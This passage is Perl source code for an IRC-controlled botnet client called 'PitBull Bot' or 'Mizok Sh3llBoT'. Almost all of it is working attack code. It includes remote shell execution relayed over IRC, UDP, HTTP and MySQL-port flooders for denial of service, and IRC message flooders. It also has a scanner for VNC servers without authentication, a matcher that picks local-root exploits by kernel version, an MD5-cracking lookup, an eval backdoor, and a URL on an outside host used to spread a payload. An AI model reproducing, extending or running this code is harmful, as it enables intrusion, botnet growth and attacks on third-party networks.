vuln=>['2.4.20','2.2.25','2.4.24']
};
$h{'newlocal'} = {
vuln=>['2.4.17','2.4.19','2.4.18']
};
$h{'ong_bak'} = {
vuln=>['2.4.','2.6.']
};
$h{'ptrace'} = {
vuln=>['2.2.','2.4.22']
};
$h{'ptrace_kmod'} = {
vuln=>['2.4.2']
};
$h{'ptrace24'} = {
vuln=>['2.4.9']
};
$h{'pwned'} = {
vuln=>['2.4.','2.6.']
};
$h{'py2'} = {
vuln=>['2.6.9','2.6.17','2.6.15','2.6.13']
};
$h{'raptor_prctl'} = {
vuln=>['2.6.13','2.6.17','2.6.16','2.6.13']
};
$h{'prctl3'} = {
vuln=>['2.6.13','2.6.17','2.6.9']
};
$h{'remap'} = {
vuln=>['2.4.']
};
$h{'rip'} = {
vuln=>['2.2.']
};
$h{'stackgrow2'} = {
vuln=>['2.4.29','2.6.10']
};
$h{'uselib24'} = {
vuln=>['2.4.29','2.6.10','2.4.22','2.4.25']
};
$h{'newsmp'} = {
vuln=>['2.6.']
};
$h{'smpracer'} = {
vuln=>['2.4.29']
};
$h{'loginx'} = {
vuln=>['2.4.22']
};
$h{'exp.sh'} = {
vuln=>['2.6.9','2.6.10','2.6.16','2.6.13']
};
$h{'prctl'} = {
vuln=>['2.6.']
};
$h{'kmdx'} = {
vuln=>['2.6.','2.4.']
};
$h{'raptor'} = {
vuln=>['2.6.13','2.6.14','2.6.15','2.6.16']
};
$h{'raptor2'} = {
vuln=>['2.6.13','2.6.14','2.6.15','2.6.16']
};
foreach my $key(keys %h){
foreach my $kernel ( @{ $h{$key}{'vuln'} } ){
if($khost=~/^$kernel/){
chop($kernel) if ($kernel=~/.$/);
sendraw($IRC_cur_socket, "PRIVMSG $printl : 12[ 4@ Rootable 12] Possible Local Root Exploits: ". $key ." ");
}
}
}
}
#Pr0xy Scan
if ($funcarg =~ /^proxy\s+(.*)/) {
my @User_Agent = &Agent();
my $str = $1;
if ($str =~ m/^(a|anon|anonymous)$/i) { $str = "anonymous";}
elsif ($str =~ m/^(transparent|tp|t)$/i) { $str = "transparent";}
elsif ($str =~ m/^(h|high|e|elite)$/i) { $str = "high anonymity";}
my @type = "$str";
sendraw($IRC_cur_socket, "PRIVMSG $printl : 12[ 4@ ProxySearcher 12] Search Type: $str");
my @ttt=();
my @ttt1=();
my @ttt2=();
my @ttt3=();
my $sockt = IO::Socket::INET->new(PeerAddr=>"publicproxyservers.com",PeerPort=>"80",Proto=>"tcp") or return;
print $sockt "GET http://www.publicproxyservers.com/page1.html HTTP/1.0\r\nHost: publicproxyservers.com\r\nAccept: */*\r\nUser-Agent: Mozilla/5.0\r\n\r\n";
my @rara = <$sockt>;
$page="@rara";
close($sockt);
while ($page =~ m/<td align=\"left\" height=17(.*)<\/td>/g)
{
push(@ttt,$1);
}
while ($page =~ m/<td>([A-Z].*)<\/td>/g)
{
push(@ttt1,$1);
}
while ($page =~ m/<td height=17>(.*)<\/td>/g)
{
push(@ttt2,$1);
}
while ($page =~ m/<td>(anonymous|transparent|high anonymity)<\/td>/g)
{
push(@ttt3,$1);
}
foreach $proxyyy (0..(@ttt - 1))
{
if ($ttt3[$proxyyy] =~ /@type/)
{
( my $a, my $ipaddr ) = split( />/, $ttt[$x]);
my $prox="".$ipaddr.":".$ttt2[$proxyyy]."";
my $ua = LWP::UserAgent->new;
$ua->timeout(10);
$ua->env_proxy;
$ua->agent($User_Agent[rand(scalar(@User_Agent))]);
$ua->proxy('http', 'http://'.$prox);
my $response = $ua->get("http://www.google.com/search?q=The_PitBull");
if ($response->is_success)
{
sendraw($IRC_cur_socket, "PRIVMSG $printl : 12[ 4@ ProxySearcher 12] 4 ".$ipaddr.":".$ttt2[$proxyyy]." 12- 4 $ttt1[$proxyyy] 12- 4 $ttt3[$proxyyy] 12- OK!");
}
}
}
done;
}
# A simple mailer, @sendmail <subject> <sender> <recipient> <message>
if ($funcarg =~ /^sendmail\s+(.*)\s+(.*)\s+(.*)\s+(.*)/) {
sendraw($IRC_cur_socket, "PRIVMSG $printl : 12[ 4@ Mailer 12] Sending Mail to : 2 $3");
$subject = $1;
$sender = $2;
$recipient = $3;
@corpo = $4;
$mailtype = "content-type: text/html";
$sendmail = '/usr/sbin/sendmail';
open (SENDMAIL, "| $sendmail -t");
print SENDMAIL "$mailtype\n";
print SENDMAIL "Subject: $subject\n";
print SENDMAIL "From: $sender\n";
print SENDMAIL "To: $recipient\n\n";
print SENDMAIL "@corpo\n\n";
close (SENDMAIL);
sendraw($IRC_cur_socket, "PRIVMSG $printl : 12[ 4@ Mailer 12] Mail Sended To : 2 $recipient");
}
#SQL Fl00dEr
if ($funcarg =~ /^sqlflood\s+(.*)\s+(\d+)/) {
sendraw($IRC_cur_socket, "PRIVMSG $printl : 12[ 4@ SQL-DDOS 12] Attacking 4 ".$1." 12 on port 3306 for 4 ".$2." 12 seconds .");
my $itime = time;
my ($cur_time);
$cur_time = time - $itime;
while ($2>$cur_time){
$cur_time = time - $itime;
my $socket = IO::Socket::INET->new(proto=>'tcp', PeerAddr=>$1, PeerPort=>3306);
print $socket "GET / HTTP/1.1\r\nAccept: */*\r\nHost: ".$1."\r\nConnection: Keep-Alive\r\n\r\n";
close($socket);
}
sendraw($IRC_cur_socket, "PRIVMSG $printl : 12[ 4@ SQL-DDOS 12] Attacking done 4 ".$1.".");
}
#r0xb0t 4.6 VNC ScaNNer by iNs
if ($funcarg =~ /^vnc\s+(.*)/) {
my $MAX_SOCKET_TIME = 2;
my $MAX_CONNECT_TIME = 3;
#&ftpcheckm($printl);
my @hosts;
my $MAX_PROCESSES=100;
my $host=$1;
#my $victim=$host;
sendraw($IRC_cur_socket, "PRIVMSG $printl : 12[ 4@ VNC 12] :::: IP Range: 4 $host* ");
$|=1;
foreach (0..255) {
my $pre="$host.$_.";
foreach (1..255) {
push(@hosts,$pre.$_);
}
}
my @pids;
my $npids=0;
for $victim (@hosts){
my $pid;
$pid=fork();
if($pid>0){
$npids++;
if($npids>=$MAX_PROCESSES){
for(1..($MAX_PROCESSES)){
$wait_ret=wait();
if($wait_ret>0){
$npids--;
}
}
}
next;
} elsif(undef $pid) {
# print "fork error\n" if ($DEBUG);
exit(0);
}else{
my($proto,$port);
$0="";
# kill thread on timeout
local $SIG{'ALRM'} = sub { exit(0); };
alarm $MAX_SOCKET_TIME;
my $port=5900;
print "Connecting to $victim:$port..."; #$| = 1;
($sock = IO::Socket::INET->new(PeerAddr => $victim,
PeerPort => $port,
Proto => 'tcp',)) ? print "\n"
: die("\n");
#negotiate protocol
$sock->read($protocol_version,12);
print $sock $protocol_version;
#print "Using protocol $protocol_version";
# get security types that we'll be ignoring
$sock->read($security_types,1);
$sock->read($hahaha,unpack('C',$security_types));
# choose no authentication
print $sock "\x01";
# we should get "0000" back
$sock->read($in,4);
if(unpack('I',$in)) { die("\n") };
# client initialize
print $sock "\x01";
# if the server starts sending data we are in
$sock->read($in,4);
(unpack('I',$in)) ?
sendraw($IRC_cur_socket, "PRIVMSG $printl : 12[ 4@ VNC 12] :::: 4 ".$victim." 12is Vulnerable using protocol 4 ".$protocol_version)
#print("Vulnerable!\n")
: die("\n") ;
exit;
}
}
for(1..$npids){
my $wt=wait();
if($wt==-1){
# print "hey $!\n" if($DEBUG);
redo;
}
}
sendraw($IRC_cur_socket, "PRIVMSG $printl : 12[ 4@ VNC 12] :::: Finished Scan for 4 $host ");
}
#-#-#-#-#-#-#-#-#
# IRC #
#-#-#-#-#-#-#-#-#
# join a other channel, @join #channel
if ($funcarg =~ /^join (.*)/) {
sendraw($IRC_cur_socket, "JOIN ".$1);
}
# part a other channel, @part #channel
if ($funcarg =~ /^part (.*)/) {
sendraw($IRC_cur_socket, "PART ".$1);
}
# quit irc, @quit <reason>
if ($funcarg =~ /^quit (.*)/) {
sendraw($IRC_cur_socket, "QUIT ".$1);
}
# voice, @voice <who>
if ($funcarg =~ /^voice (.*)/) {
sendraw($IRC_cur_socket, "MODE $printl +v ".$1);
}
# devoice, @devoice <who>
if ($funcarg =~ /^devoice (.*)/) {
sendraw($IRC_cur_socket, "MODE $printl -v ".$1);
}
# halfop, @halfop <who>
if ($funcarg =~ /^halfop (.*)/) {
sendraw($IRC_cur_socket, "MODE $printl +h ".$1);
}
# dehalfop, @dehalfop <who>
if ($funcarg =~ /^dehalfop (.*)/) {
sendraw($IRC_cur_socket, "MODE $printl -h ".$1);
}
# op, @op <who>
if ($funcarg =~ /^op (.*)/) {
sendraw($IRC_cur_socket, "MODE $printl +o ".$1);
}
# deop, @deop <who>
if ($funcarg =~ /^deop (.*)/) {
sendraw($IRC_cur_socket, "MODE $printl -o ".$1);
}
# +Q, @owner <who>
if ($funcarg =~ /^owner (.*)/) {
sendraw($IRC_cur_socket, "MODE $printl +q ".$1);
}
# -Q, @deowner <who>
if ($funcarg =~ /^deowner (.*)/) {
sendraw($IRC_cur_socket, "MODE $printl -q ".$1);
}
#-#-#-#-#-#-#-#-#
# Flooders IRC #
#-#-#-#-#-#-#-#-#
# msg, @msgflood <who>
if ($funcarg =~ /^msgflood (.+?) (.*)/) {
for($i=0; $i<=10; $i+=1){
sendraw($IRC_cur_socket, "PRIVMSG ".$1." ".$2);
}
sendraw($IRC_cur_socket, "PRIVMSG $printl : 12[ 4@ MSGFlood 12] 14 Excecuted on ".$1." ");
}
# dccflood, @dccflood <who>
if ($funcarg =~ /^dccflood (.*)/) {
for($i=0; $i<=10; $i+=1){
sendraw($IRC_cur_socket, "PRIVMSG ".$1." :\001DCC CHAT chat 1121485131 1024\001\n");
}
sendraw($IRC_cur_socket, "PRIVMSG $printl : 12[ 4@ DCCFlood 12] 14 Excecuted on ".$1." ");
}
# ctcpflood, @ctcpflood <who>
if ($funcarg =~ /^ctcpflood (.*)/) {
for($i=0; $i<=10; $i+=1){
sendraw($IRC_cur_socket, "PRIVMSG ".$1." :\001VERSION\001\n");
sendraw($IRC_cur_socket, "PRIVMSG ".$1." :\001PING\001\n");
}
sendraw($IRC_cur_socket, "PRIVMSG $printl : 12[ 4@ CTCPFlood 12] 14 Excecuted on ".$1." ");
}
# noticeflood, @noticeflood <who>
if ($funcarg =~ /^noticeflood (.*)/) {
for($i=0; $i<=10; $i+=1){
sendraw($IRC_cur_socket, "NOTICE ".$1." :PitBull BoT V5\n");
}
sendraw($IRC_cur_socket, "PRIVMSG $printl : 12[ 4@ NoticeFlood 12] 14 Excecuted on ".$1." ");
}
# Channel Flood, @channelflood
if ($funcarg =~ /^channelflood/) {
for($i=0; $i<=25; $i+=1){
sendraw($IRC_cur_socket, "JOIN #".(int(rand(99999))) );
}
sendraw($IRC_cur_socket, "PRIVMSG $printl : 12[ 4@ ChannelFlood 12] 14 Excecuted ");
}
# Maxi Flood, @maxiflood
if ($funcarg =~ /^maxiflood(.*)/) {
for($i=0; $i<=15; $i+=1){
sendraw($IRC_cur_socket, "NOTICE ".$1." :PitBull BoT V5 M4Xi-Fl00d\n");
sendraw($IRC_cur_socket, "PRIVMSG ".$1." :\001VERSION\001\n");
sendraw($IRC_cur_socket, "PRIVMSG ".$1." :\001PING\001\n");
sendraw($IRC_cur_socket, "PRIVMSG ".$1." :PitBull BoT V5 M4Xi-Fl00d\n");
}
sendraw($IRC_cur_socket, "PRIVMSG $printl : 12[ 4@ M4Xi-Fl00d 12] 14 Excecuted on ".$1." ");
}
#-#-#-#-#-#-#-#-#
# DDOS #
#-#-#-#-#-#-#-#-#
#HTTP Flooder
if ($funcarg =~ /^httpflood\s+(.*)\s+(\d+)/) {
sendraw($IRC_cur_socket, "PRIVMSG $printl : 12[ 4@ HTTP-DDOS 12] Attacking 4 ".$1." 12 on port 80 for 4 ".$2." 12 seconds .");
my $itime = time;
my ($cur_time);
$cur_time = time - $itime;
while ($2>$cur_time){
$cur_time = time - $itime;
my $socket = IO::Socket::INET->new(proto=>'tcp', PeerAddr=>$1, PeerPort=>80);
print $socket "GET / HTTP/1.1\r\nAccept: */*\r\nHost: ".$1."\r\nConnection: Keep-Alive\r\n\r\n";
close($socket);
}
sendraw($IRC_cur_socket, "PRIVMSG $printl : 12[ 4@ HTTP-DDOS 12] Attacking done 4 ".$1.".");
}
# UDP Flooder
if ($funcarg =~ /^udpflood\s+(.*)\s+(\d+)\s+(\d+)/) {
sendraw($IRC_cur_socket, "PRIVMSG $printl : 12[ 4@ UDP-DDOS 12] Attacking 4 ".$1." 12 with 4 ".$2." 12 Kb Packets for 4 ".$3." 12 seconds. ");
my ($dtime, %pacotes) = udpflooder("$1", "$2", "$3");
$dtime = 1 if $dtime == 0;
my %bytes;
$bytes{igmp} = $2 * $pacotes{igmp};
$bytes{icmp} = $2 * $pacotes{icmp};
$bytes{o} = $2 * $pacotes{o};
$bytes{udp} = $2 * $pacotes{udp};
$bytes{tcp} = $2 * $pacotes{tcp};
sendraw($IRC_cur_socket, "PRIVMSG $printl : 12[ 4@ UDP-DDOS 12] 12Results 4 ".int(($bytes{icmp}+$bytes{igmp}+$bytes{udp} + $bytes{o})/1024)." 12Kb in 4 ".$dtime." 12seconds to 4 ".$1.".");
}
exit;
}
}
sub ircase {
my ($kem, $printl, $case) = @_;
if ($case =~ /^join (.*)/) {
j("$1");
}
if ($case =~ /^part (.*)/) {
p("$1");
}
if ($case =~ /^rejoin\s+(.*)/) {
my $chan = $1;
if ($chan =~ /^(\d+) (.*)/) {
for (my $ca = 1; $ca <= $1; $ca++ ) {
p("$2");
j("$2");
}
}
else {
p("$chan");
j("$chan");
}
}
if ($case =~ /^op/) {
op("$printl", "$kem") if $case eq "op";
my $oarg = substr($case, 3);
op("$1", "$2") if ($oarg =~ /(\S+)\s+(\S+)/);
}
if ($case =~ /^deop/) {
deop("$printl", "$kem") if $case eq "deop";
my $oarg = substr($case, 5);
deop("$1", "$2") if ($oarg =~ /(\S+)\s+(\S+)/);
}
if ($case =~ /^msg\s+(\S+) (.*)/) {
msg("$1", "$2");
}
if ($case =~ /^flood\s+(\d+)\s+(\S+) (.*)/) {
for (my $cf = 1; $cf <= $1; $cf++) {
msg("$2", "$3");
}
}
if ($case =~ /^ctcp\s+(\S+) (.*)/) {
ctcp("$1", "$2");
}
if ($case =~ /^ctcpflood\s+(\d+)\s+(\S+) (.*)/) {
for (my $cf = 1; $cf <= $1; $cf++) {
ctcp("$2", "$3");
}
}
if ($case =~ /^nick (.*)/) {
nick("$1");
}
if ($case =~ /^connect\s+(\S+)\s+(\S+)/) {
conectar("$2", "$1", 6667);
}
if ($case =~ /^raw (.*)/) {
sendraw("$1");
}
if ($case =~ /^eval (.*)/) {
eval "$1";
}
}
sub shell {
my $printl=$_[0];
my $comando=$_[1];
if ($comando =~ /cd (.*)/) {
chdir("$1") || msg("$printl", "No such file or directory");
return;
}
elsif ($pid = fork) {
waitpid($pid, 0);
}
else {
if (fork) {
exit;
} else {
my @resp=`$comando 2>&1 3>&1`;
my $c=0;
foreach my $linha (@resp) {
$c++;
chop $linha;
sendraw($IRC_cur_socket, "PRIVMSG $printl : 12[ 4@ SH3LL 12] 14 $linha");
if ($c == "$max_lines") {
$c=0;
sleep $sleeping;
}
}
exit;
}
}
}
sub Agent(){
my @ret = (
"Microsoft Internet Explorer/4.0b1 (Windows 95)",
"Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)",
"Mozilla/1.22 (compatible; MSIE 2.0; Windows 95)",
"Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)",
"Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)",
"Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)",
"Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)",
"Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)",
"Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)",
"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)",
"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)",
"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)",
"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)",
"Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)",
"Mozilla/4.0 (compatible; MSIE 7.0b; Win32)",
"Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)",
"Microsoft Pocket Internet Explorer/0.6",
"Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)",
"MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;",
"Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)",
"Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)",
"Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)",
"Advanced Browser (http://www.avantbrowser.com)",
"Avant Browser (http://www.avantbrowser.com)",
"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)",
"Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)",
"Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)",
"Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007",
"Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511",
"Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929",
"Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0",
"Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox",
"Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4",
"Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5",
"Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6",
"Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6",
"Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7",
"Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7",
"Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4",
"Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4",
"Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5",
"Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1",
"Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1",
"Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1",
"Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1",
"Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1",
"Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2",
"Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0",
"Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b",
"Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0",
"Mozilla/3.0 (OS/2; U)",
"Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)",
"Mozilla/4.61 (Macintosh; I; PPC)",
"Mozilla/4.61 [en] (OS/2; U)",
"Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)",
"Mozilla/4.8 [en] (Windows NT 5.0; U)" );
return(@ret);
}
sub udpflooder {
my $iaddr = inet_aton($_[0]);
my $msg = 'A' x $_[1];
my $ftime = $_[2];
my $cp = 0;
my (%pacotes);
$pacotes{icmp} = $pacotes{igmp} = $pacotes{udp} = $pacotes{o} = $pacotes{tcp} = 0;
socket(SOCK1, PF_INET, SOCK_RAW, 2) or $cp++;
socket(SOCK2, PF_INET, SOCK_DGRAM, 17) or $cp++;
socket(SOCK3, PF_INET, SOCK_RAW, 1) or $cp++;
socket(SOCK4, PF_INET, SOCK_RAW, 6) or $cp++;
return(undef) if $cp == 4;
my $itime = time;
my ($cur_time);
while ( 1 ) {
for (my $port = 1;
$port <= 65000; $port++) {
$cur_time = time - $itime;
last if $cur_time >= $ftime;
send(SOCK1, $msg, 0, sockaddr_in($port, $iaddr)) and $pacotes{igmp}++;
send(SOCK2, $msg, 0, sockaddr_in($port, $iaddr)) and $pacotes{udp}++;
send(SOCK3, $msg, 0, sockaddr_in($port, $iaddr)) and $pacotes{icmp}++;
send(SOCK4, $msg, 0, sockaddr_in($port, $iaddr)) and $pacotes{tcp}++;
for (my $pc = 3;
$pc <= 255;$pc++) {
next if $pc == 6;
$cur_time = time - $itime;
last if $cur_time >= $ftime;
socket(SOCK5, PF_INET, SOCK_RAW, $pc) or next;
send(SOCK5, $msg, 0, sockaddr_in($port, $iaddr)) and $pacotes{o}++;
}
}
last if $cur_time >= $ftime;
}
return($cur_time, %pacotes);
}
sub ctcp {
return unless $#_ == 1;
sendraw("PRIVMSG $_[0] :\001$_[1]\001");
}
sub msg {
return unless $#_ == 1;
sendraw("PRIVMSG $_[0] :$_[1]");
}
sub notice {
return unless $#_ == 1;
sendraw("NOTICE $_[0] :$_[1]");
}
sub op {
return unless $#_ == 1;
sendraw("MODE $_[0] +o $_[1]");
}
sub deop {
return unless $#_ == 1;
sendraw("MODE $_[0] -o $_[1]");
}
sub j {
&join(@_);
}
sub join {
return unless $#_ == 0;
sendraw("JOIN $_[0]");
}
sub p { part(@_);
}
sub part {
sendraw("PART $_[0]");
}
sub nick {
return unless $#_ == 0;
sendraw("NICK $_[0]");
}
sub quit {
sendraw("QUIT :$_[0]");
}
sub ice(){
my $md5hash = $_[1];
chomp $md5hash;
my $query = "http://ice.breaker.free.fr/md5.php?hash=".$md5hash;
my $checker = query($query);
if ($checker =~ m/<b><br><br> - (.*?)<br><br><br>/g) {
my $cracked="$1";
sendraw($IRC_cur_socket, "PRIVMSG $printl : 12[ 4@ MD5-ice.breaker.free.fr 4@ 12 ] 4 ==> ".$cracked."");
} else {
sendraw($IRC_cur_socket, "PRIVMSG $printl : 12[ 4@ MD5-ice.breaker.free.fr 4@ 12 ] 1 Has not Found.");
}}
sub gdata(){
my $md5hash = $_[1];
chomp $md5hash;
my $query = "http://www.gdataonline.com/qkhash.php?mode=txt&hash=".$md5hash;
my $checker = query($query);
if ($checker =~ m/<b>(.*?)<\/b><\/td>/g) {
my $cracked="$1";
sendraw($IRC_cur_socket, "PRIVMSG $printl : 12[ 4@ MD5-gdataonline.com 4@ 12 ] 4 ==> ".$cracked."");
} else {
sendraw($IRC_cur_socket, "PRIVMSG $printl : 12[ 4@ MD5-gdataonline.com 4@ 12 ] 1 Has not Found.");
}}
sub redn(){
my $md5hash = $_[1];
chomp $md5hash;
my $query = "http://md5.rednoize.com/?p&s=md5&q=".$md5hash;
my $checker = query($query);
if ($checker =~ m/<(.*)/g) {
my $cracked="$1";
sendraw($IRC_cur_socket, "PRIVMSG $printl : 12[ 4@ MD5-rednoize.com 4@ 12 ] 4 ==> ".$cracked);
} else {
sendraw($IRC_cur_socket, "PRIVMSG $printl : 12[ 4@ MD5-rednoize.com 4@ 12 ] 1 Has not Found.");
}}
sub xpz(){
my $md5hash = $_[1];
chomp $md5hash;
my $query = "http://md5.xpzone.de/?string=".$md5hash."&mode=decrypt";
my $checker = query($query);
if ($checker =~ m/<b>(.*)<\/b>/g) {
my $cracked="$1";
sendraw($IRC_cur_socket, "PRIVMSG $printl : 12[ 4@ MD5-xpzone.de 4@ 12 ] 4 ==> ".$cracked);
} else {
sendraw($IRC_cur_socket, "PRIVMSG $printl : 12[ 4@ MD5-xpzone.de 4@ 12 ] 1 Has not Found.");
}}
sub ben(){
my $md5hash = $_[1];
chomp $md5hash;
my $query = "http://md5.benramsey.com/md5.php?hash=".$md5hash;
my $checker = query($query);
if ($checker =~ m/<string><\!\[CDATA\[(.+?)\]\]><\/string>/g) {
my $cracked="$1";
sendraw($IRC_cur_socket, "PRIVMSG $printl : 12[ 4@ MD5-benramsey.com 4@ 12 ] 4 ==> ".$cracked);
} else {
sendraw($IRC_cur_socket, "PRIVMSG $printl : 12[ 4@ MD5-benramsey.com 4@ 12 ] 1 Has not Found.");
}}
sub alim(){
my $md5hash = $_[1];
chomp $md5hash;
my $query = "http://alimamed.pp.ru/md5/?md5e=&md5d=".$md5hash;
my $checker = query($query);
if ($checker =~ m/<b>(.+?)<\/b>/g) {
my $cracked="$1";
sendraw($IRC_cur_socket, "PRIVMSG $printl : 12[ 4@ MD5-alimamed.pp.ru 4@ 12 ] 4 ==> ".$cracked);
} else {
sendraw($IRC_cur_socket, "PRIVMSG $printl : 12[ 4@ MD5-alimamed.pp.ru 4@ 12 ] 1 Has not Found.");
}}
sub cry(){
my $md5hash = $_[1];
chomp $md5hash;
my $query = "http://us.md5.crysm.net/find?md5=".$md5hash;
my $checker = query($query);
if ($checker =~ m/<li>(.+?)<\/li>/g) {
my $cracked="$1";
sendraw($IRC_cur_socket, "PRIVMSG $printl : 12[ 4@ MD5-crysm.net 4@ 12 ] 4 ==> ".$cracked);
} else {
sendraw($IRC_cur_socket, "PRIVMSG $printl : 12[ 4@ MD5-crysm.net 4@ 12 ] 1 Has not Found.");
}}
sub query($) {
my $url=$_[0];
$url=~s/http:\/\///;
my $host=$url;
my $query=$url;
my $page="";
$host=~s/href=\"?http:\/\///;
$host=~s/([-a-zA-Z0-9\.]+)\/.*/$1/;
$query=~s/$host//;
if ($query eq "") { $query="/";};
eval {
my $sock = IO::Socket::INET->new(PeerAddr=>"$host",PeerPort=>"80",Proto=>"tcp") or return;
print $sock "GET $query HTTP/1.0\r\nHost: $host\r\nAccept: */*\r\nUser-Agent: Mozilla/5.0\r\n\r\n";
my @r = <$sock>;
$page="@r";
close($sock);
};
return $page;
}
sub fix_url($) {
my $str=$_[0];
if ($str =~ m/^http:\/\/(.*)/i || $str =~ m/^https:\/\/(.*)/i) {
$set="".$str."";
}
else {
$set="http://".$str."";
}
return $set;
}
sub http_query($){
my ($url) = @_;
my $host=$url;
my $query=$url;
my $page="";
$host =~ s/href=\"?http:\/\///;
$host =~ s/([-a-zA-Z0-9\.]+)\/.*/$1/;
$query =~s/$host//;
if ($query eq "") {$query="/";};
eval {
local $SIG{ALRM} = sub { die "1";};
alarm 10;
my $sock = IO::Socket::INET->new(PeerAddr=>"$host",PeerPort=>"80",Proto=>"tcp") or return;
print $sock "GET $query HTTP/1.0\r\nHost: $host\r\nAccept: */*\r\nUser-Agent: Mozilla/5.0\r\n\r\n";
my @r = <$sock>;
$page="@r";
alarm 0;
close($sock);
};
return $page;
}
}
#system 'cd /tmp;rm -rf *';
#
# Mizok Bot V3.2 PRiVaTE Sh3llBoT
#
# Last edited : 12/2/2010
#
#[@[PitBull Bot V5 Commands List]@]
#[@-----[Shellbot/Hacking Based]-----@]
#!bot @admins
#!bot @spread <rfi>
#!bot @milw0rm
#!bot @packetstorm
#!bot @portscan <host>
#!bot @logcleaner
#!bot @md5 <hash>
#!bot @sendmail <subject> <sender> <recipient> <message>
#!bot @vnc <B-Class>
#!bot @boxip
#!bot @socks5
#!bot @cleartmp
#!bot @portchk <host> <port>
#!bot @proxy <a|t|e>
#!bot @rootable
#!bot @modules
#!bot @cpanel <host> <user> <port>
#!bot @visit <url>
#!bot @shellfind <c99/r57/mys/phm/rem>
#[@-----[IRC Based]-----@]
#!bot @join <#channel>
#!bot @part <#channel>
#!bot @quit <reason>
#!bot @voice <who>
#!bot @devoice <who>
#!bot @halfop <who>
#!bot @dehalfop <who>
#!bot @op <who>
#!bot @deop <who>
#!bot @owner <who>
#!bot @deowner <who>
#[@-----[DDos Based]-----@]
#!bot @udpflood <host> <packetsize> <time>
#!bot @httpflood <host> <time>
#!bot @sqlflood <host> <time>
#[@-----[Flooding Based]-----@]
#!bot @msgflood <who>
#!bot @dccflood <who>
#!bot @ctcpflood <who>
#!bot @noticeflood <who>
#!bot @channelflood
#!bot @maxiflood <who>
#[@[PitBull Bot V5 Commands List]@]
#
# Sh3llBoT
#
######################
#print " After installation, Linux requires configuration and systems administration. Corporate systems need monitoring, backups, updates, as well as system and user management. Ubuntu (apt), CentOS, Fedora and Red Hat (rpm/YUM) server and desktop systems adminstration are covered by this script. Please dont exit the script or it will result in a broken linux partition";
######################
# Specify your data:
#--------------------------------------------------------------#
my $max_lines= '10';
my $sleeping= '3';
my $prefix = "shellbot"; # "!" is included :)
my $spread = "http://www.theblackhole.us/forum/chat/inc/cmses/bind/s.txt";
my @admins = ("Vicktor");
my @hostauth= ("Vicktor.ro");
